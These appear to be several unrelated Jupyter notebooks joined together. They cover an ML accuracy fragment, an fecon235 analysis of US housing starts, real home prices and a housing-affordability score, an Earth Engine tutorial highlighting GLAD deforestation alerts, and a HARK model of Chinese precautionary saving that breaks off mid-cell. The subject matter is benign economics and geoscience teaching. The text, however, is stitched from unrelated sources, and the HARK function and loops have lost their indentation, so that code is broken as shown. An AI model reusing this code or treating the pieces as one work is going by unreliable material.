print(len(y_test_third))
y_test_third = np.array(y_test_third)
print(np.sum(y_pred_third_int==y_test_third)/len(y_pred_third_int))
### accuracy on training set
y_pred = model3(X_train_third)
y_pred_int = []
for item in y_pred:
    y_pred_int.append(round(float(item[0])))
print(y_pred_int)
print(y_train_third)
print(np.sum(y_pred_int==np.array(y_train_third))/len(y_pred_int))
```
# Housing economy, home prices and affordability
Alan Greenspan in 2014 pointed out that there was never a recovery from recession
without improvements in housing construction. Here we examine some relevant data,
including the Case-Shiller series, and derive an insightful
measure of the housing economy, **hscore**, which takes affordability into account.
Contents:
- Housing Starts
- Constructing a Home Price Index
- Real home prices
- Indebtedness for typical home buyer
- hscore: Housing starts scored by affordability
- Concluding remarks
*Dependencies:*
- Repository: https://github.com/rsvp/fecon235
- Python: matplotlib, pandas
*CHANGE LOG*

- 2016-02-08  Fix issue #2 by v4 and p6 updates. Our hscore index has been
  completely revised. Another 12 months of additional data.
- 2015-02-10  Code review and revision.
- 2014-09-11  First version.
```
from fecon235.fecon235 import *
# PREAMBLE-p6.15.1223 :: Settings and system details
from __future__ import absolute_import, print_function
system.specs()
pwd = system.getpwd() # present working directory as variable.
print(" :: $pwd:", pwd)
# If a module is modified, automatically reload it:
%load_ext autoreload
%autoreload 2
# Use 0 to disable this feature.
# Notebook DISPLAY options:
# Represent pandas DataFrames as text; not HTML representation:
import pandas as pd
pd.set_option( 'display.notebook_repr_html', False )
# Beware, for MATH display, use %%latex, NOT the following:
# from IPython.display import Math
# from IPython.display import Latex
from IPython.display import HTML # useful for snippets
# e.g. HTML('<iframe src=http://en.mobile.wikipedia.org/?useformat=mobile width=700 height=350></iframe>')
from IPython.display import Image
# e.g. Image(filename='holt-winters-equations.png', embed=True) # url= also works
from IPython.display import YouTubeVideo
# e.g. YouTubeVideo('1j_HxD4iLn8', start='43', width=600, height=400)
from IPython.core import page
get_ipython().set_hook('show_in_pager', page.as_hook(page.display_page), 0)
# Or equivalently in config file: "InteractiveShell.display_page = True",
# which will display results in secondary notebook pager frame in a cell.
# Generate PLOTS inside notebook, "inline" generates static png:
%matplotlib inline
# "notebook" argument allows interactive zoom and resize.
```
## Housing Starts
*Housing starts* is an economic indicator that reflects the number of
privately owned new houses (technically housing units) on which
construction has been started in a given period.
We retrieve monthly data released by the U.S. Bureau of the Census.
```
# In thousands of units:
hs = get( m4housing )
# m4 indicates monthly frequency.
# plot( hs )
```
Since housing is what houses people, over the long-term
it is reasonable to examine **housing starts per capita**.
```
# US population in thousands:
pop = get( m4pop )
# Factor 100.00 converts operation to float and percentage terms:
hspop = todf((hs * 100.00) / pop)
plot( hspop )
```
**At the peaks, about 1% of the *US population was allocated new housing monthly*.
The lowest point shown, after the Great Recession, is 0.2%.**
Clearly there's a downward historical trend, so to discern **short-term housing cycles**,
we detrend and normalize hspop.
```
plot(detrendnorm( hspop ))
```
Surprisingly, housing starts per capita during the Great Recession did not
exceed two standard deviations on the downside.
2015-02-10 and 2016-02-08: It appears that housing starts have recovered relatively
and are back to mean trend levels.
In the concluding section, we shall derive another measure of housing activity
which takes affordability into account.
## Constructing a Home Price Index
The correlation between Case-Shiller indexes, 20-city vs 10-city, is practically 1.
Thus a mash-up is warranted to get data extended back to 1987.
Case-Shiller is not dollar denominated (but rather a chain of changes)
so we use the median sales prices from 2000 to mid-2014 released by the
National Association of Realtors to estimate home price,
see function **gethomepx** for explicit details.
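The splicing idea behind **gethomepx** can be sketched independently: rescale a chained index so that it equals a known dollar price at an anchor date, which expresses the whole series in dollars. The numbers below are toy values, not the actual Case-Shiller or NAR data:

```python
import pandas as pd

# Toy chained index and a known dollar price at an anchor date
# (illustrative values only; the real inputs are Case-Shiller and NAR data):
index = pd.Series([100.0, 110.0, 121.0],
                  index=pd.period_range('2000-01', periods=3, freq='M'))
anchor_date, anchor_price = '2000-01', 140000.0

# Rescale the index so it equals the dollar price at the anchor date:
dollars = index * (anchor_price / index.loc[anchor_date])
print(dollars.iloc[-1])  # 169400.0
```

Because the rescaling is a single multiplicative constant, all period-over-period changes in the chained index are preserved exactly.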
```
# We can use ? or ?? to extract code info:
gethomepx??
# Our interface will not ask the user to enter such messy details...
homepx = get( m4homepx )
# m4 indicates monthly home prices.
# Case-Shiller is seasonally adjusted:
plot( homepx )
# so the plot appears relatively smooth.
# Geometric rate of return since 1987:
georet( homepx, 12 )
```
The first element tells us home prices have increased
approximately 3.7% per annum.
The third element shows price volatility of 2.5%
which is very low compared to other asset classes.
But this does not take into account inflation.
In any case, recent home prices are still below
the levels just before the Great Recession.
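The geometric return reported by **georet** can be sketched from first principles: compound the total growth over the sample and annualize by the number of periods per year. The prices below are toy values, not the notebook's data:

```python
import numpy as np

def geo_annual_return(prices, periods_per_year=12):
    """Annualized geometric return from a series of periodic prices."""
    prices = np.asarray(prices, dtype=float)
    total_growth = prices[-1] / prices[0]
    n_periods = len(prices) - 1
    return total_growth ** (periods_per_year / n_periods) - 1.0

# Toy example: 1% growth per month for 12 months
prices = [100.0 * 1.01 ** k for k in range(13)]
print(round(geo_annual_return(prices), 4))  # 0.1268
```

The geometric (not arithmetic) mean is the right notion here because returns compound multiplicatively over time.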
## Real home prices
```
# This is a synthetic deflator created from four sources:
# CPI and PCE, both headline and core:
defl = get( m4defl )
# "Real" will mean in constant (inflation-adjusted) dollars:
homepxr = todf( homepx * defl )
# r for real
plot( homepxr )
# Real geometric return of home prices:
georet( homepxr, 12 )
```
*Real* home prices since 1987 have increased at the approximate
rate of +1.3% per annum.
Note that the above does not account for annual property taxes,
which could diminish real price appreciation.
Perhaps home prices are only increasing because new stock of housing
has been declining over the long-term (as shown previously).
The years 1997-2006 are considered a **housing bubble**
due to the widespread availability of *subprime mortgages*
(cf. NINJA loans: No Income, No Job or Assets, applications which were often not rejected).
**Median home prices *doubled* in real terms**: from \$140,000 to \$280,000.
**Great Recession took down home prices** (180-280)/280 = **-36% in real terms.**
2015-02-10: we are roughly at 200/280 = 71% of peak home price in real terms.
2016-02-08: we are roughly at 220/280 = 79% of peak home price in real terms.
## Indebtedness for typical home buyer
For a sketch, we assume a fixed premium for some long-term mortgages over 10-y Treasuries,
and then compute the number of hours needed to
pay *only the interest on the full home price* (i.e. no down payment assumed).
This sketch does not strive for strict veracity, but simply serves as an
indicator to model the housing economy.
```
mortpremium = 1.50
mortgage = todf( get(m4bond10) + mortpremium )
# Yearly interest to be paid off:
interest = todf( homepx * (mortgage / 100.00) )
# Wage is in dollars per hour:
wage = get( m4wage )
# Working hours to pay off just the interest:
interesthours = todf( interest / wage )
# Mortgage interest to be paid as portion of ANNUAL income,
# assuming 2000 working hours per year:
payhome = todf( interesthours / 2000.00 )
# We ignore tiny portion of mortgage payment made towards reducing principal.
# And of course, the huge disparity in earned income among the population.
plot( payhome )
```
If we assume 2000 hours worked per year (40 hours for 50 weeks), we can see that
interest payment can potentially take up to 50% of total annual pre-tax income.
2015-02-10: Currently that figure is about 20% so housing should be affordable,
but the population is uncertain about the risk of taking on debt.
(What if unemployment looms in the future?)
Prospects of deflation add to the fear of such risk.
Debt is best taken on in inflationary environments.
The housing bubble clearly illustrated that
huge *price risk* of the underlying asset could be an important consideration.
Thus renting a home (without any equity stake) may appear preferable to buying one.
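The payhome calculation above reduces to simple arithmetic: annual interest on the full price, divided by annual wage income. A standalone sketch with round illustrative numbers (not the notebook's actual data):

```python
def interest_share_of_income(home_price, mortgage_rate, hourly_wage,
                             hours_per_year=2000.0):
    """Fraction of annual pre-tax income needed for interest-only payments
    on the full home price (no down payment assumed)."""
    annual_interest = home_price * mortgage_rate
    annual_income = hourly_wage * hours_per_year
    return annual_interest / annual_income

# Illustrative values only: a $250,000 home, 4% mortgage rate, $25/hour wage:
print(interest_share_of_income(250000, 0.04, 25.0))  # 0.2
```

With these toy inputs the interest burden is 20% of pre-tax income, in the same neighborhood as the notebook's 2015-2016 readings.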
```
# # Forecast payhome for the next 12 months:
# forecast( payhome, 12 )
```
2016-02-09: Homes should be slightly more affordable: 19% of annual income -- perhaps
due to further declining interest rates, or even some
increase in wages for the typical American worker.
Caution: although the numbers may indicate increased affordability,
it has become *far more difficult to obtain mortgage financing due to
strict credit requirements*. The pendulum of scrutiny from the NINJA days of the
subprime era has swung to the opposite extreme.
Subprime mortgages were the root cause of the Great Recession.
A fuller treatment would require another notebook which studies credit flows
from financial institutions to home buyers.
Great Recession: There is evidence recently that families shifted to home rentals,
avoiding home ownership which would entail taking on mortgage debt.
Some home owners experienced negative equity.
And when the debt could not be paid due to wage loss, it seemed reasonable to
walk away from their homes, even if that meant damage to their credit worthiness.
*Housing construction had to compete with a large supply of foreclosed homes on the market.*
## hscore: Housing starts scored by affordability
The basic idea here is that housing starts can be weighted by some
proxy of "affordability."
An unsold housing unit cannot be good for a healthy economy.
Recall that our variable *payhome* was constructed as a function of
home price, interest rate, and wage income -- to solve for the portion
of annual income needed to pay off a home purchase -- i.e. indebtedness.
**Home affordability** can thus be *abstractly* represented as 0 < (1-payhome) < 1,
by ignoring living expenses of the home buyer.
```
afford = todf( 1 - payhome )
# hspop can be interpreted as the percentage of the population allocated new housing.
# Let's weight hspop by afford to score housing starts...
hscore = todf( hspop * afford )
# ... loosely interpreted as new "affordable" housing relative to population.
plot( hscore )
stat( hscore )
```
**hscore** can be roughly interpreted as "affordable" housing starts
expressed as percentage of the total U.S. population.
The overall mean of *hscore* is approximately 0.31, and we observe a band between
0.31 and 0.47 from 1993 to 2004.
That band could be interpreted as an equilibrium region for the housing economy
(before the Housing Bubble and Great Recession).
It's also worth noting that long-term interest rates during that epoch were
determined by the market, as yet untouched by the massive *quantitative easing*
programs initiated by the Federal Reserve.
```
# Forecast for hscore, 12-months ahead:
forecast( hscore, 12 )
```
## Concluding remarks
We created an index **hscore** which expresses new "affordable" housing units
as percentage of total population. Affordability was crudely modeled by a few
well-known economic variables, plus our extended Case-Shiller index
of median home prices.
- 2016-02-09 Following the Great-Recession lows around 0.13, *hscore* has now reverted to its long-term mean of 0.31, *confirming the recovery*, and is forecasted to slightly increase to 0.33.
- The Fed terminated its QE program but has not sold off any of its mortgage securities. That reduces upward pressure on mortgage rates. However, our *hscore* supports the Fed's rate hike decision on 2015-12-16 since it gives evidence that the housing market has recovered midway between the housing bubble and the subprime mortgage crisis.
<table class="ee-notebook-buttons" align="left">
<td><a target="_blank" href="https://github.com/giswqs/earthengine-py-notebooks/tree/master/Tutorials/Keiko/glad_alert.ipynb"><img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" /> View source on GitHub</a></td>
<td><a target="_blank" href="https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/Tutorials/Keiko/glad_alert.ipynb"><img width=26px src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png" />Notebook Viewer</a></td>
<td><a target="_blank" href="https://mybinder.org/v2/gh/giswqs/earthengine-py-notebooks/master?filepath=Tutorials/Keiko/glad_alert.ipynb"><img width=58px src="https://mybinder.org/static/images/logo_social.png" />Run in binder</a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/Tutorials/Keiko/glad_alert.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" /> Run in Google Colab</a></td>
</table>
## Install Earth Engine API
Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`.
The following script checks whether the geehydro package has been installed. If not, it will install geehydro, which automatically installs its dependencies, including earthengine-api and folium.
```
import subprocess
try:
    import geehydro
except ImportError:
    print('geehydro package not installed. Installing ...')
    subprocess.check_call(["python", '-m', 'pip', 'install', 'geehydro'])
```
Import libraries
```
import ee
import folium
import geehydro
```
Authenticate and initialize Earth Engine API. You only need to authenticate the Earth Engine API once.
```
try:
    ee.Initialize()
except Exception as e:
    ee.Authenticate()
    ee.Initialize()
```
## Create an interactive map
This step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function.
The optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`.
```
Map = folium.Map(location=[40, -100], zoom_start=4)
Map.setOptions('HYBRID')
```
## Add Earth Engine Python script
```
# Credits to: Keiko Nomura, Senior Analyst, Space Intelligence Ltd
# Source: https://medium.com/google-earth/10-tips-for-becoming-an-earth-engine-expert-b11aad9e598b
# GEE JS: https://code.earthengine.google.com/?scriptPath=users%2Fnkeikon%2Fmedium%3Afire_australia
geometry = ee.Geometry.Polygon(
[[[153.11338711694282, -28.12778417421283],
[153.11338711694282, -28.189835226562256],
[153.18943310693305, -28.189835226562256],
[153.18943310693305, -28.12778417421283]]])
Map.centerObject(ee.FeatureCollection(geometry), 14)
imageDec = ee.Image('COPERNICUS/S2_SR/20191202T235239_20191202T235239_T56JNP')
Map.addLayer(imageDec, {
'bands': ['B4', 'B3', 'B2'],
'min': 0,
'max': 1800
}, 'True colours (Dec 2019)')
Map.addLayer(imageDec, {
'bands': ['B3', 'B3', 'B3'],
'min': 0,
'max': 1800
}, 'grey')
# GLAD Alert (tree loss alert) from the University of Maryland
UMD = ee.ImageCollection('projects/glad/alert/UpdResult')
print(UMD)
# conf19 is the 2019 alert band; a value of 3 means multiple alerts
ASIAalert = ee.Image('projects/glad/alert/UpdResult/01_01_ASIA') \
.select(['conf19']).eq(3)
# Turn loss pixels into True colours and increase the green strength ('before' image)
imageLoss = imageDec.multiply(ASIAalert)
imageLoss_vis = imageLoss.selfMask().visualize(**{
'bands': ['B4', 'B3', 'B2'],
'min': 0,
'max': 1800
})
Map.addLayer(imageLoss_vis, {
'gamma': 0.6
}, '2019 loss alert pixels in True colours')
# It is still hard to see the loss area. You can circle them in red
# Scale the results to the dataset's nominal projection scale for display on the map.
# Reprojecting with a specified scale ensures that pixel area does not change with zoom.
buffered = ASIAalert.focal_max(50, 'circle', 'meters', 1)
bufferOnly = ASIAalert.add(buffered).eq(1)
prj = ASIAalert.projection()
scale = prj.nominalScale()
bufferScaled = bufferOnly.selfMask().reproject(prj.atScale(scale))
Map.addLayer(bufferScaled, {
'palette': 'red'
}, 'highlight the loss alert pixels')
# Create a grey background for mosaic
noAlert = imageDec.multiply(ASIAalert.eq(0))
grey = noAlert.multiply(bufferScaled.unmask().eq(0))
# Export the image
imageMosaic = ee.ImageCollection([
imageLoss_vis.visualize(**{
'gamma': 0.6
}),
bufferScaled.visualize(**{
'palette': 'red'
}),
grey.selfMask().visualize(**{
'bands': ['B3', 'B3', 'B3'],
'min': 0,
'max': 1800
})
]).mosaic()
#Map.addLayer(imageMosaic, {}, 'export')
# The export call below uses Earth Engine JS API syntax and is kept commented
# for reference only (the Python API equivalent is ee.batch.Export.image.toDrive):
# Export.image.toDrive({
#   'image': imageMosaic,
#   'description': 'Alert',
#   'region': geometry,
#   'crs': 'EPSG:3857',
#   'scale': 10
# })
```
## Display Earth Engine data layers
```
Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True)
Map
```
```
# Initial imports and notebook setup, click arrow to show
%matplotlib inline
# The first step is to be able to bring things in from different directories
import sys
import os
sys.path.insert(0, os.path.abspath('../lib'))
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
from util import log_progress
import HARK # Prevents import error from Demos repo
```
# Do Precautionary Motives Explain China's High Saving Rate?
The notebook [Nondurables-During-Great-Recession](http://econ-ark.org/notebooks/) shows that the collapse in consumer spending in the U.S. during the Great Recession could easily have been caused by a moderate and plausible increase in the degree of uncertainty.
But that exercise might make you worry that invoking difficult-to-measure "uncertainty" can explain anything (e.g. "the stock market fell today because the risk aversion of the representative agent increased").
The next exercise is designed to show that there are limits to the phenomena that can be explained by invoking plausible changes in uncertainty.
The specific question is whether a high degree of uncertainty can explain China's very high saving rate (approximately 25 percent), as some papers have proposed. Specifically, we ask "what beliefs about uncertainty would Chinese consumers need to hold in order to generate a saving rate of 25 percent, given the rapid pace of Chinese growth?"
### The Thought Experiment
In more detail, our consumers will initially live in a stationary, low-growth environment (intended to approximate China before 1978). Then, unexpectedly, income growth will surge at the same time that income uncertainty increases (intended to approximate the effect of economic reforms in China since 1978.) Consumers believe the high-growth, high-uncertainty state is highly persistent, but that ultimately growth will slow to a "normal" pace matching that of other advanced countries.
### The Baseline Model
We want the model to have these elements:
0. "Standard" infinite horizon consumption/savings model, with mortality and permanent and temporary shocks to income
0. The capacity to provide a reasonable match to the distribution of wealth inequality in advanced economies
0. Ex-ante heterogeneity in consumers' discount factors (to capture wealth inequality)
All of these are features of the model in the paper ["The Distribution of Wealth and the Marginal Propensity to Consume" by Carroll, Slacalek, Tokuoka, and White (2017)](http://econ.jhu.edu/people/ccarroll/papers/cstwMPC), for which all of the computational results were produced using the HARK toolkit. The results for that paper are available in the $\texttt{cstwMPC}$ directory.
### But With A Different ConsumerType
One feature that was not present in that model is important here:
- A Markov state that represents the state of the Chinese economy (to be detailed later)
HARK's $\texttt{MarkovConsumerType}$ is the right tool for this experiment. So we need to prepare the parameters to create that ConsumerType, and then create it.
```
# Initialize the cstwMPC parameters
init_China_parameters = {
"CRRA":1.0, # Coefficient of relative risk aversion
"Rfree":1.01/(1.0 - 1.0/160.0), # Interest factor, adjusted for survival probability,
"PermGroFac":[1.000**0.25], # Permanent income growth factor (no perm growth),
"PermGroFacAgg":1.0,
"BoroCnstArt":0.0,
"CubicBool":False,
"vFuncBool":False,
"PermShkStd":[(0.01*4/11)**0.5], # Standard deviation of permanent shocks to income
"PermShkCount":5, # Number of points in permanent income shock grid
"TranShkStd":[(0.01*4)**0.5], # Standard deviation of transitory shocks to income,
"TranShkCount":5, # Number of points in transitory income shock grid
"UnempPrb":0.07, # Probability of unemployment while working
"IncUnemp":0.15, # Unemployment benefit replacement rate
"UnempPrbRet":None,
"IncUnempRet":None,
"aXtraMin":0.00001, # Minimum end-of-period assets in grid
"aXtraMax":20, # Maximum end-of-period assets in grid
"aXtraCount":20, # Number of points in assets grid,
"aXtraExtra":[None],
"aXtraNestFac":3, # Number of times to 'exponentially nest' when constructing assets grid
"LivPrb":[1.0 - 1.0/160.0], # Survival probability
"DiscFac":0.97, # Default intertemporal discount factor, # dummy value, will be overwritten
"cycles":0,
"T_cycle":1,
"T_retire":0,
'T_sim':1200, # Number of periods to simulate (idiosyncratic shocks model, perpetual youth)
'T_age': 400,
'IndL': 10.0/9.0, # Labor supply per individual (constant),
'aNrmInitMean':np.log(0.00001),
'aNrmInitStd':0.0,
'pLvlInitMean':0.0,
'pLvlInitStd':0.0,
'AgentCount':0, # will be overwritten by parameter distributor
}
```
### Set Up the Growth Process
For a Markov model, we need a Markov transition array. Here, we create that array.
Remember, for this simple example, we just have a low-growth state, and a high-growth state
```
StateCount = 2 #number of Markov states
ProbGrowthEnds = (1./160.) #probability agents assign to the high-growth state ending
MrkvArray = np.array([[1.,0.],[ProbGrowthEnds,1.-ProbGrowthEnds]]) #Markov array
init_China_parameters['MrkvArray'] = [MrkvArray] #assign the Markov array as a parameter
```
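A quick sanity check on the transition matrix, using the standard result that a state with constant exit probability p lasts 1/p periods on average, so an exit probability of 1/160 per quarter implies the high-growth state persists for 40 years in expectation:

```python
import numpy as np

StateCount = 2
ProbGrowthEnds = 1.0 / 160.0
MrkvArray = np.array([[1.0, 0.0],
                      [ProbGrowthEnds, 1.0 - ProbGrowthEnds]])

# Each row is a conditional probability distribution, so rows must sum to 1:
assert np.allclose(MrkvArray.sum(axis=1), 1.0)

# Expected duration of the high-growth state, in quarters and in years:
expected_quarters = 1.0 / ProbGrowthEnds
print(expected_quarters, expected_quarters / 4)  # 160.0 40.0
```

Note the low-growth row is absorbing from the agents' point of view: they assign zero probability to the reforms ever happening.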
One other parameter needs to change: the number of agents in simulation. We want to increase this, because later on when we vastly increase the variance of the permanent income shock, things get wonky. (We need to change this value here, before we have used the parameters to initialize the $\texttt{MarkovConsumerType}$, because this parameter is used during initialization.)
Other parameters that are not used during initialization can also be assigned here, by changing the appropriate value in the $\texttt{init_China_parameters_dictionary}$; however, they can also be changed later, by altering the appropriate attribute of the initialized $\texttt{MarkovConsumerType}$.
```
init_China_parameters['AgentCount'] = 10000
```
### Import and initialize the Agents
Here, we bring in an agent making a consumption/savings decision every period, subject to transitory and permanent income shocks, AND a Markov shock
```
from HARK.ConsumptionSaving.ConsMarkovModel import MarkovConsumerType
ChinaExample = MarkovConsumerType(**init_China_parameters)
```
Currently, Markov states can differ in their interest factor, permanent growth factor, survival probability, and income distribution. Each of these needs to be specifically set.
Do that here, except income distribution, which will be done later (because we want to examine the consequences of different income distributions).
```
ChinaExample.assignParameters(PermGroFac = [np.array([1.,1.06 ** (.25)])], #needs to be a list, with 0th element of shape (StateCount,)
                              Rfree = np.array(StateCount*[init_China_parameters['Rfree']]), #needs to be an array of shape (StateCount,)
                              LivPrb = [np.array(StateCount*[init_China_parameters['LivPrb']][0])], #needs to be a list, with 0th element of shape (StateCount,)
cycles = 0)
ChinaExample.track_vars = ['aNrmNow','cNrmNow','pLvlNow'] # Names of variables to be tracked
```
Now, add in ex-ante heterogeneity in consumers' discount factors
The cstwMPC parameters do not define a discount factor, since there is ex-ante heterogeneity in the discount factor. To prepare to create this ex-ante heterogeneity, first create the desired number of consumer types:
```
num_consumer_types = 7 # declare the number of types we want
ChineseConsumerTypes = [] # initialize an empty list
for nn in log_progress(range(num_consumer_types), every=1):
    # Now create the types, and append them to the list ChineseConsumerTypes
    newType = deepcopy(ChinaExample)
    ChineseConsumerTypes.append(newType)
```
Now, generate the desired ex-ante heterogeneity by giving each of the consumer types its own discount factor.
First, decide the discount factors to assign:
```
from HARK.utilities import approxUniform
bottomDiscFac = 0.9800
topDiscFac = 0.9934
DiscFac_list = approxUniform(N=num_consumer_types,bot=bottomDiscFac,top=topDiscFac)[1]
# Now, assign the discount factors we want to the ChineseConsumerTypes
for j in log_progress(range(num_consumer_types), every=1):
    ChineseConsumerTypes[j].DiscFac = DiscFac_list[j]
```
## Setting Up the Experiment
The experiment is performed by a function we will now write.
Recall that all parameters have been assigned appropriately, except for the income process.
This is because we want to see how much uncertainty needs to accompany the high-growth state to generate the desired high savings rate.
Therefore, among other things, this function will have to initialize and assign the appropriate income process.
```
# First create the income distribution in the low-growth state, which we will not change
from HARK.ConsumptionSaving.ConsIndShockModel import constructLognormalIncomeProcessUnemployment
import HARK.ConsumptionSaving.ConsumerParameters as IncomeParams
LowGrowthIncomeDstn = constructLognormalIncomeProcessUnemployment(IncomeParams)[0][0]
# Remember the standard deviation of the permanent income shock in the low-growth state for later
LowGrowth_PermShkStd = IncomeParams.PermShkStd
def calcNatlSavingRate(PrmShkVar_multiplier,RNG_seed = 0):
"""
This function actually performs the experiment we want.
Remember this experiment is: get consumers into the steady-state associated with the low-growth
regime. Then, give them an unanticipated shock that increases the income growth rate
and permanent income uncertainty at the same time. What happens to the path for
the national saving rate? Can an increase in permanent income uncertainty
explain the high Chinese saving rate since economic reforms began?
The inputs are:
* PrmShkVar_multiplier, the number by which we want to multiply the variance
of the permanent shock in the low-growth state to get the variance of the
permanent shock in the high-growth state
* RNG_seed, an integer to seed the random number generator for simulations. This useful
because we are going to run this function for different values of PrmShkVar_multiplier,
and we may not necessarily want the simulated agents in each run to experience
the same (normalized) shocks.
"""
# First, make a deepcopy of the ChineseConsumerTypes (each with their own discount factor),
# because we are going to alter them
ChineseConsumerTypesNew = deepcopy(ChineseConsumerTypes)
# Set the uncertainty in the high-growth state to the desired amount, keeping in mind
# that PermShkStd is a list of length 1
PrmShkStd_multiplier = PrmShkVar_multiplier ** .5
IncomeParams.PermShkStd = [LowGrowth_PermShkStd[0] * PrmShkStd_multiplier]
# Construct the appropriate income distributions
HighGrowthIncomeDstn = constructLognormalIncomeProcessUnemployment(IncomeParams)[0][0]
# To calculate the national saving rate, we need national income and national consumption
# To get those, we are going to start national income and consumption at 0, and then
# loop through each agent type and see how much they contribute to income and consumption.
NatlIncome = 0.
NatlCons = 0.
for ChineseConsumerTypeNew in ChineseConsumerTypesNew:
### For each consumer type (i.e. each discount factor), calculate total income
### and consumption
# First give each ConsumerType their own random number seed
RNG_seed += 19
ChineseConsumerTypeNew.seed = RNG_seed
# Set the income distribution in each Markov state appropriately
ChineseConsumerTypeNew.IncomeDstn = [[LowGrowthIncomeDstn,HighGrowthIncomeDstn]]
# Solve the problem for this ChineseConsumerTypeNew
ChineseConsumerTypeNew.solve()
"""
Now we are ready to simulate.
This case will be a bit different than most, because agents' *perceptions* of the probability
of changes in the Chinese economy will differ from the actual probability of changes.
Specifically, agents think there is a 0% chance of moving out of the low-growth state, and
that there is a (1./160) chance of moving out of the high-growth state. In reality, we
want the Chinese economy to reach the low growth steady state, and then move into the
high growth state with probability 1. Then we want it to persist in the high growth
state for 40 years.
"""
## Now, simulate 500 quarters to get to steady state, then 40 years of high growth
ChineseConsumerTypeNew.T_sim = 660
# Ordinarily, the simulate method for a MarkovConsumerType randomly draws Markov states
# according to the transition probabilities in MrkvArray *independently* for each simulated
# agent. In this case, however, we want the discrete state to be *perfectly coordinated*
# across agents-- it represents a macroeconomic state, not a microeconomic one! In fact,
# we don't want a random history at all, but rather a specific, predetermined history: 125
# years of low growth, followed by 40 years of high growth.
# To do this, we're going to "hack" our consumer type a bit. First, we set the attribute
# MrkvPrbsInit so that all of the initial Markov states are in the low growth state. Then
# we initialize the simulation and run it for 500 quarters. However, as we do not
# want the Markov state to change during this time, we change its MrkvArray to always be in
# the low growth state with probability 1.
ChineseConsumerTypeNew.MrkvPrbsInit = np.array([1.0,0.0]) # All consumers born in low growth state
ChineseConsumerTypeNew.MrkvArray[0] = np.array([[1.0,0.0],[1.0,0.0]]) # Stay in low growth state
ChineseConsumerTypeNew.initializeSim() # Clear the history and make all newborn agents
ChineseConsumerTypeNew.simulate(500) # Simulate 500 quarters of data
# Now we want the high growth state to occur for the next 160 periods. We change the initial
# Markov probabilities so that any agent born during this time (to replace an agent who
# died) is born in the high growth state. Moreover, we change the MrkvArray to *always* be
# in the high growth state with probability 1. Then we simulate 160 more quarters.
ChineseConsumerTypeNew.MrkvPrbsInit = np.array([0.0,1.0]) # All consumers born in high growth state
ChineseConsumerTypeNew.MrkvArray[0] = np.array([[0.0,1.0],[0.0,1.0]]) # Stay in high growth state
ChineseConsumerTypeNew.simulate(160) # Simulate 160 quarters of data
# Now, get the aggregate income and consumption of this ConsumerType over time
IncomeOfThisConsumerType = np.sum((ChineseConsumerTypeNew.aNrmNow_hist*ChineseConsumerTypeNew.pLvlNow_hist*
(ChineseConsumerTypeNew.Rfree[0] - 1.)) +
ChineseConsumerTypeNew.pLvlNow_hist, axis=1)
ConsOfThisConsumerType = np.sum(ChineseConsumerTypeNew.cNrmNow_hist*ChineseConsumerTypeNew.pLvlNow_hist,axis=1)
# Add the income and consumption of this ConsumerType to national income and consumption
NatlIncome += IncomeOfThisConsumerType
NatlCons += ConsOfThisConsumerType
# After looping through all the ConsumerTypes, calculate and return the path of the national
# saving rate
NatlSavingRate = (NatlIncome - NatlCons)/NatlIncome
return NatlSavingRate
```
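As a minimal sketch of the Markov transition structure described in the comments above (plain NumPy, independent of the HARK consumer types): agents *perceive* a 0% chance of leaving the low-growth state and a 1/160 chance of leaving the high-growth state, while the simulation *imposes* deterministic regimes by overwriting `MrkvArray`.

```python
import numpy as np

# Perceived transition matrix (rows: current state, cols: next state).
# State 0 = low growth, state 1 = high growth.
p = 1. / 160.
MrkvPerceived = np.array([[1.0, 0.0],      # low growth is absorbing, as perceived
                          [p,   1. - p]])  # leave high growth with prob 1/160

# Matrices actually imposed during the simulation, one regime at a time:
MrkvLowForever  = np.array([[1.0, 0.0], [1.0, 0.0]])  # always low growth
MrkvHighForever = np.array([[0.0, 1.0], [0.0, 1.0]])  # always high growth

# Rows of a valid transition matrix sum to one.
assert np.allclose(MrkvPerceived.sum(axis=1), 1.0)

# Under the perceived matrix, time spent in the high-growth state is geometric
# with success probability 1/160, so the expected sojourn is 160 quarters = 40 years.
print(1. / p)  # 160.0
```

This is why the agents' *expected* duration of the high-growth regime matches the 40-year window the simulation actually imposes.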
Now we can use the function we just defined to calculate the path of the national saving rate following the economic reforms, for a given value of the increase to the variance of permanent income accompanying the reforms. We are going to graph this path for various values for this increase.
Remember, we want to see if any plausible value for this increase can explain the high Chinese saving rate.
```
# Declare the number of periods before the reforms to plot in the graph
quarters_before_reform_to_plot = 5
# Declare the quarters we want to plot results for
quarters_to_plot = np.arange(-quarters_before_reform_to_plot ,160,1)
# Create a list to hold the paths of the national saving rate
NatlSavingsRates = []
# Create a list of floats to multiply the variance of the permanent shock to income by
PermShkVarMultipliers = (1.,2.,4.,8.,11.)
# Loop through the desired multipliers, then get the path of the national saving rate
# following economic reforms, assuming that the variance of the permanent income shock
# was multiplied by the given multiplier
index = 0
for PermShkVarMultiplier in log_progress(PermShkVarMultipliers, every=1):
NatlSavingsRates.append(calcNatlSavingRate(PermShkVarMultiplier,RNG_seed = index)[-160 - quarters_before_reform_to_plot :])
index +=1
```
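The slice `[-160 - quarters_before_reform_to_plot:]` in the loop above keeps exactly as many observations as there are entries in `quarters_to_plot`, so the two arrays line up when plotted. A quick standalone check (toy array, not the model output):

```python
import numpy as np

quarters_before_reform_to_plot = 5
quarters_to_plot = np.arange(-quarters_before_reform_to_plot, 160, 1)

# Pretend we simulated the full 660 quarters of saving rates.
fake_path = np.zeros(660)
trimmed = fake_path[-160 - quarters_before_reform_to_plot:]

# Both have 165 points: 5 pre-reform quarters plus 160 post-reform quarters.
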